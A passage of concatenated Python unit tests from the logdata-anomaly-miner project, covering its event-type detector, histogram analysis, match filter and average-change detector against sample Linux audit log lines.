exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement( 'mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) def test1receive_atoms_with_default_values(self): """ In this test case multiple log_atoms are received with default values of the EventTypeDetector. target_path_list is empty and all paths are learned dynamically in variable_key_list. """ event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) log_atoms = [] for line in self.log_lines: t = time.time() log_atoms.append( LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__)) for i, log_atom in enumerate(log_atoms): self.assertTrue(event_type_detector.receive_atom(log_atom)) self.assertEqual(event_type_detector.total_records, i + 1) def test2receive_atoms_with_defined_path_list(self): """ In this test case multiple log_atoms are received with default values of the EventTypeDetector. target_path_list is set to a static list of paths and variable_key_list should not be used. """ event_type_detector = EventTypeDetector( self.aminer_config, [self.stream_printer_event_handler], target_path_list=['parser/type/path/nametype']) results = [True, False, True, False, True, False, True, True, False, False, True, True, False, True, False, True, False, True, False, False, True] log_atoms = [] for line in self.log_lines: t = time.time() log_atoms.append( LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__)) for i, log_atom in enumerate(log_atoms): old_vals = (event_type_detector.num_events, event_type_detector.num_event_lines, event_type_detector.total_records, event_type_detector.longest_path) self.assertEqual(event_type_detector.receive_atom(log_atom), not results[i], i) if results[i]: self.assertEqual(old_vals, ( event_type_detector.num_events, event_type_detector.num_event_lines, event_type_detector.total_records, event_type_detector.longest_path)) def test3append_values_float(self): """This unittest checks the append_values method with raw_match_object being a float value.""" event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) # initialize all values. t = time.time() log_atom = LogAtom(b'22.2', ParserMatch(MatchElement('path', b'22.2', 22.2, None)), t, self.__class__.__name__) event_type_detector.receive_atom(log_atom) event_type_detector.values = [[[]]] event_type_detector.append_values(log_atom, 0) self.assertEqual(event_type_detector.values, [[[22.2]]]) log_atom = LogAtom(b'22', ParserMatch(MatchElement('path', b'22', 22, None)), t, self.__class__.__name__) event_type_detector.values = [[[]]] event_type_detector.append_values(log_atom, 0) self.assertEqual(event_type_detector.values, [[[22]]]) log_atom = LogAtom(b'22.2', ParserMatch(MatchElement('path', b'22', b'22', None)), t, self.__class__.__name__) event_type_detector.values = [[[]]] event_type_detector.append_values(log_atom, 0) self.assertEqual(event_type_detector.values, [[[22]]]) def test4append_values_bytestring(self): """ This unittest checks the append_values method with raw_match_object being a bytestring. This should trigger a ValueError and append the match_string. """ event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) # initialize all values. t = time.time() log_atom = LogAtom(b'This is a string', ParserMatch( MatchElement('path', b'This is a string', b'This is a string', None)), t, self.__class__.__name__) event_type_detector.receive_atom(log_atom) event_type_detector.values = [[[]]] event_type_detector.append_values(log_atom, 0) self.assertEqual(event_type_detector.values, [[['This is a string']]]) log_atom = LogAtom(b'24.05.', ParserMatch(MatchElement('path', b'24.05.', b'24.05.', None)), t, self.__class__.__name__) event_type_detector.values = [[[]]] event_type_detector.append_values(log_atom, 0) self.assertEqual(event_type_detector.values, [[['24.05.']]]) def test5check_value_reduction(self): """This unittest checks the functionality of reducing the values when the maxNumVals threshold is reached.""" event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() val_list = [[[]]] for i in range(1, event_type_detector.max_num_vals + 1, 1): log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement('path', str(i).encode(), i, None)), t, self.__class__.__name__) val_list[0][0].append(float(i)) self.assertTrue(event_type_detector.receive_atom(log_atom)) self.assertEqual(event_type_detector.values, val_list) i += 1 log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement('path', str(i).encode(), i, None)), t, self.__class__.__name__) val_list[0][0].append(float(i)) self.assertTrue(event_type_detector.receive_atom(log_atom)) self.assertEqual(event_type_detector.values, [[val_list[0][0][-event_type_detector.min_num_vals:]]]) def test6persist_and_load_data(self): """This unittest checks the functionality of the persistence by persisting and reloading values.""" event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() log_atom = LogAtom(b'22.2', ParserMatch(MatchElement('path', b'22.2', 22.2, None)), t, self.__class__.__name__) event_type_detector.receive_atom(log_atom) event_type_detector.do_persist() event_type_detector_loaded = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertEqual(event_type_detector.variable_key_list, event_type_detector_loaded.variable_key_list) self.assertEqual(event_type_detector.values, event_type_detector_loaded.values) self.assertEqual(event_type_detector.longest_path, event_type_detector_loaded.longest_path) self.assertEqual(event_type_detector.check_variables, event_type_detector_loaded.check_variables) self.assertEqual(event_type_detector.num_event_lines, event_type_detector_loaded.num_event_lines) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/HistogramAnalysisTest.py000066400000000000000000000471731437606560100304760ustar00rootroot00000000000000import unittest from aminer.analysis.HistogramAnalysis import LinearNumericBinDefinition, ModuloTimeBinDefinition, HistogramData, HistogramAnalysis, \ PathDependentHistogramAnalysis from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from datetime import datetime from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class HistogramAnalysisTest(TestBase): """Unittests for the HistogramAnalysis.""" __expected_string_histogram_analysis = '%s Histogram report\n%s: "%s" (%d lines)\n Histogram report from %s till %s\n %s\n\n' __expected_string_path_dependent_histogram_analysis = '%s Histogram report\n%s: "%s" (%d lines)\n Path histogram report from %s ' \ 'till %s\n%s\n\n' match_crontab = 'match/crontab' datetime_format_string = '%Y-%m-%d %H:%M:%S' def test1linear_numeric_bin_definition_get_bin_names(self): """This test case aims to test the functionality of the LinearNumericBinDefinition's get_bin_names method.""" linear_numeric_bin_definition = LinearNumericBinDefinition(0, 1, 10, True) self.assertEqual(linear_numeric_bin_definition.get_bin_names(), [ '...-0]', '[0-1]', '[1-2]', '[2-3]', '[3-4]', '[4-5]', '[5-6]', '[6-7]', '[7-8]', '[8-9]', '[9-10]', '[10-...']) linear_numeric_bin_definition = LinearNumericBinDefinition(0, 2, 10, True) self.assertEqual(linear_numeric_bin_definition.get_bin_names(), [ '...-0]', '[0-2]', '[2-4]', '[4-6]', '[6-8]', '[8-10]', '[10-12]', '[12-14]', '[14-16]', '[16-18]', '[18-20]', '[20-...']) def test2linear_numeric_bin_definition_get_bin(self): """This test case aims to test the functionality of the LinearNumericBinDefinition's get_bin method.""" linear_numeric_bin_definition = LinearNumericBinDefinition(0, 1, 10, True) self.assertEqual(linear_numeric_bin_definition.get_bin(2), 3) linear_numeric_bin_definition = LinearNumericBinDefinition(1, 1, 10, True) self.assertEqual(linear_numeric_bin_definition.get_bin(2), 2) linear_numeric_bin_definition = LinearNumericBinDefinition(2, 1, 10, True) self.assertEqual(linear_numeric_bin_definition.get_bin(2), 1) linear_numeric_bin_definition = LinearNumericBinDefinition(0, 4, 10, True) self.assertEqual(linear_numeric_bin_definition.get_bin(2), 1) def test3linear_numeric_bin_definition_get_bin_p_values(self): """This test case aims to test the functionality of the LinearNumericBinDefinition's get_bin_p_values method.""" linear_numeric_bin_definition = LinearNumericBinDefinition(0, 1, 10, True) self.assertNotEqual(linear_numeric_bin_definition.get_bin_p_value(2, 10, [2, 2]), None, 'Probably the scipy module could not be loaded. Please check your installation.') def test4_modulo_time_bin_definition_get_bin(self): """This test case aims to test the functionality of the ModuloTimeBinDefinition's getBin method.""" modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) self.assertEqual(modulo_time_bin_definition.get_bin(57599), 15) self.assertEqual(modulo_time_bin_definition.get_bin(57600), 16) self.assertEqual(modulo_time_bin_definition.get_bin(61199), 16) self.assertEqual(modulo_time_bin_definition.get_bin(61200), 17) def test5_histogram_data_add_value(self): """This test case aims to test the addition of Values to HistogramData class.""" modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("crontab", modulo_time_bin_definition) histogram_data.add_value(57600) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.total_elements, 1) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(61200) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 1) self.assertEqual(histogram_data.total_elements, 2) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(61500) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 2) self.assertEqual(histogram_data.total_elements, 3) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(100000) # 100000%86400 = 13600 -> 3 self.assertEqual(histogram_data.bin_data[3], 1) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 2) self.assertEqual(histogram_data.total_elements, 4) self.assertEqual(histogram_data.binned_elements, 0) def test6_histogram_data_reset(self): """This test case aims to test resetting the Values of the HistogramData class.""" modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("crontab", modulo_time_bin_definition) histogram_data.add_value(57600) histogram_data.add_value(61200) histogram_data.reset() self.assertEqual(histogram_data.total_elements, 0) self.assertEqual(histogram_data.binned_elements, 0) for item in histogram_data.bin_data: self.assertEqual(item, 0) def test7_histogram_data_clone(self): """This test case aims to test cloning a HistogramData object.""" modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("crontab", modulo_time_bin_definition) histogram_data.add_value(57600) histogram_data.add_value(61200) clone = histogram_data.clone() self.assertEqual(clone.bin_data[16], 1) self.assertEqual(clone.bin_data[17], 1) self.assertEqual(clone.total_elements, 2) self.assertEqual(clone.binned_elements, 0) clone.add_value(1) self.assertEqual(clone.bin_data[0], 1) self.assertEqual(histogram_data.bin_data[0], 0) def test8_histogram_data_to_string(self): """This test case aims to test the functionality of the HistogramData's to_string method.""" modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("crontab", modulo_time_bin_definition) histogram_data.add_value(57600) histogram_data.add_value(61200) clone = histogram_data.clone() self.assertEqual(clone.bin_data[16], 1) self.assertEqual(clone.bin_data[17], 1) self.assertEqual(clone.total_elements, 2) self.assertEqual(clone.binned_elements, 0) clone.add_value(1) self.assertEqual(clone.bin_data[0], 1) self.assertEqual(histogram_data.bin_data[0], 0) self.assertEqual(clone.to_string(''), 'Property "crontab" (3 elements):\n* [0-1]: 1 (ratio = 3.33e-01, p = 1.20e-01)\n* [16-17]: ' '1 (ratio = 3.33e-01, p = 1.20e-01)\n* [17-18]: 1 (ratio = 3.33e-01, p = 1.20e-01)') def test9HistogramAnalysisReceiveAtomNoReport(self): """This test case aims to test the functionality of the HistogramAnalysis's receive_atom method, when NO report is expected.""" description = "Test9HistogramAnalysis" start_time = 57600 end_time = 662600 diff = 30000 modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition) histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], 604800, [self.stream_printer_event_handler], True, 'Default') self.analysis_context.register_component(histogram_analysis, description) match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None) t = time.time() log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis) histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') # resetting the outputStream start_time = start_time + 3600 end_time = end_time + 3600 self.reset_output_stream() t = t + diff log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis) histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') def test10_histogram_analysis_receive_atom_report_expected(self): """This test case aims to test the functionality of the HistogramAnalysis's receive_atom method, when A report is expected.""" description = "Test10HistogramAnalysis" start_time = 57600 end_time = 662600 diff = 605000 modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition) histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], 604800, [self.stream_printer_event_handler], True, 'Default') self.analysis_context.register_component(histogram_analysis, description) match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None) t = time.time() log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis) histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), self.__expected_string_histogram_analysis % ( datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), histogram_analysis.__class__.__name__, description, 2, datetime.fromtimestamp(t).strftime(self.datetime_format_string), datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), 'Property "match/crontab" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)')) # resetting the outputStream start_time = start_time + 3600 end_time = end_time + 3600 self.reset_output_stream() t = t + diff log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis) histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), self.__expected_string_histogram_analysis % ( datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), histogram_analysis.__class__.__name__, description, 2, datetime.fromtimestamp(t).strftime(self.datetime_format_string), datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), 'Property "match/crontab" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 ' '(ratio = 5.00e-01, p = 8.16e-02)')) def test11_path_dependent_histogram_analysis_no_report(self): """ This test case aims to test the functionality of the PathDependantHistogramAnalysis.receive_atom method. No report is expected. """ description = "Test11HistogramAnalysis" start_time = 57600 end_time = 662600 diff = 30000 modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( self.aminer_config, histogram_data.property_path, modulo_time_bin_definition, 604800, [self.stream_printer_event_handler], True, 'Default') self.analysis_context.register_component(path_dependent_histogram_analysis, description) match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None) t = time.time() log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') # resetting the outputStream start_time = start_time + 3600 end_time = end_time + 3600 self.reset_output_stream() t = t + diff log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') def test12_path_dependent_histogram_analysis_report_expected(self): """ This test case aims to test the functionality of the PathDependantHistogramAnalysis.receiveAtom method. A report is expected. """ description = "Test12HistogramAnalysis" start_time = 57600 end_time = 662600 diff = 605000 modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( self.aminer_config, histogram_data.property_path, modulo_time_bin_definition, 604800, [self.stream_printer_event_handler], True, 'Default') self.analysis_context.register_component(path_dependent_histogram_analysis, description) match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None) t = time.time() log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), self.__expected_string_path_dependent_histogram_analysis % ( datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), path_dependent_histogram_analysis.__class__.__name__, description, 2, datetime.fromtimestamp(t).strftime(self.datetime_format_string), datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), 'Path values "match/crontab":\nExample: 662600\n Property "match/crontab" (2 elements):\n * [16-17]: 2 ' '(ratio = 1.00e+00, p = 1.74e-03)')) # resetting the outputStream start_time = start_time + 3600 end_time = end_time + 3600 self.output_stream.seek(0) self.output_stream.truncate(0) t = t + diff log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) histogram_data.add_value(start_time) histogram_data.add_value(end_time) histogram_data.add_value(start_time) histogram_data.add_value(end_time) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis) path_dependent_histogram_analysis.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), self.__expected_string_path_dependent_histogram_analysis % ( datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), path_dependent_histogram_analysis.__class__.__name__, description, 3, datetime.fromtimestamp(t).strftime(self.datetime_format_string), datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), 'Path values "match/crontab":\nExample: 666200\n Property "match/crontab" (3 elements):\n * [16-17]: 1 ' '(ratio = 3.33e-01, p = 1.20e-01)\n * [17-18]: 2 (ratio = 6.67e-01, p = 5.06e-03)')) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MatchFilterTest.py000066400000000000000000000110101437606560100272140ustar00rootroot00000000000000import unittest import time from unit.TestBase import TestBase from aminer.analysis.MatchFilter import MatchFilter from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from datetime import datetime class MatchFilterTest(TestBase): """Unittests for the MatchFilter.""" __expected_string = '%s Log Atom Filtered\nMatchFilter: "%s" (1 lines)\n %d\n\n' def test1_receive_atom_trigger_event(self): """This test checks if an event is triggered if the path is in the target_path_list.""" description = "Test1MatchFilterTest" decimal_integer_me = DecimalIntegerValueModelElement('integer') match_filter = MatchFilter(self.aminer_config, ['/integer'], [self.stream_printer_event_handler]) self.analysis_context.register_component(match_filter, description) t = time.time() for val in range(1000): val_str = str(val).encode('utf-8') log_atom = LogAtom(val_str, ParserMatch(decimal_integer_me.get_match_element('', MatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) self.assertEqual(self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), description, val), self.output_stream.getvalue()) self.reset_output_stream() def test2_receive_atom_trigger_no_event(self): """This test checks if an event is not triggered if the path is not in the target_path_list.""" description = "Test2MatchFilterTest" decimal_integer_me = DecimalIntegerValueModelElement('integer') match_filter = MatchFilter(self.aminer_config, ['/strings'], [self.stream_printer_event_handler]) self.analysis_context.register_component(match_filter, description) t = time.time() for val in range(1000): val_str = str(val).encode('utf-8') log_atom = LogAtom(val_str, ParserMatch(decimal_integer_me.get_match_element('', MatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) self.assertEqual('', self.output_stream.getvalue()) def test3_receive_atom_with_target_value(self): """This test checks if an event is triggered, when the path is in the target_path_list and the value is in the target_value_list.""" description = "Test3MatchFilterTest" decimal_integer_me = DecimalIntegerValueModelElement('integer') match_filter = MatchFilter(self.aminer_config, ['/integer'], [self.stream_printer_event_handler], target_value_list=list( range(1001))) self.analysis_context.register_component(match_filter, description) t = time.time() for val in range(1000): val_str = str(val).encode('utf-8') log_atom = LogAtom(val_str, ParserMatch(decimal_integer_me.get_match_element('', MatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) self.assertEqual(self.__expected_string % (datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), description, val), self.output_stream.getvalue()) self.reset_output_stream() def test4_receive_atom_with_no_target_value(self): """ This test checks if an event is not triggered. The path is in the target_path_list and the value is not in the target_value_list. """ description = "Test4MatchFilterTest" decimal_integer_me = DecimalIntegerValueModelElement('integer') match_filter = MatchFilter(self.aminer_config, ['/integer'], [self.stream_printer_event_handler], target_value_list=list( range(501))) self.analysis_context.register_component(match_filter, description) t = time.time() for val in range(1000): val_str = str(val).encode('utf-8') log_atom = LogAtom(val_str, ParserMatch(decimal_integer_me.get_match_element('', MatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) if val <= 500: self.assertEqual(self.__expected_string % (datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), description, val), self.output_stream.getvalue()) else: self.assertEqual('', self.output_stream.getvalue()) self.reset_output_stream() if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MatchValueAverageChangeDetectorTest.py000066400000000000000000000361011437606560100331460ustar00rootroot00000000000000import unittest from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.parsing.MatchElement import MatchElement from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from datetime import datetime import time class MatchValueAverageChangeDetectorTest(TestBase): """Unittests for the MatchValueAverageChangeDetector.""" __expected_string = '%s Statistical data report\n%s: "%s" (%d lines)\n "cron/job1": Change: new: n = 3, avg = %s, ' \ 'var = 100000000.0; old: n = 3, avg = %s, var = 1000000.0\n\n' __expected_string2 = '%s Statistical data report\n%s: "%s" (%d lines)\n "cron/job1": Change: new: n = 2, avg = %s, ' \ 'var = 50000000.0; old: n = 2, avg = %s, var = 500000.0\n "cron/job2": Change: new: n = 2, avg = %s, ' \ 'var = 60500000.0; old: n = 2, avg = %s, var = 500000.0\n\n' cron_job1 = 'cron/job1' cron_job2 = 'cron/job2' def test1receive_atom_min_bin_elements_not_reached(self): """This test verifies, that no statistic evaluation is performed, until the minimal amount of bin elements is reached.""" description = "Test1MatchValueAverageChangeDetector" start_time = 57600 match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None) match_value_average_change_detector = MatchValueAverageChangeDetector(self.aminer_config, [ self.stream_printer_event_handler], None, [match_element1.get_path()], 3, start_time, False, 'Default') self.analysis_context.register_component(match_value_average_change_detector, description) # create oldBin log_atom = LogAtom(match_element1.get_match_object(), ParserMatch(match_element1), start_time, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 1000), start_time + 1000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 1000, match_value_average_change_detector) 